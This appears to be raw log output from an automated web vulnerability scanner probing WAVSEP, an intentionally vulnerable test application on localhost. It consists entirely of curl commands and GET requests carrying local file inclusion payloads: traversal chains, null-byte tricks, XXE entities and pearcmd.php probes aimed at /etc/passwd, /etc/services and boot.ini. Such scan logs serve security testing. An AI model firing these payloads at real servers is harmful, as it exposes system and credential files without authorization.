curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
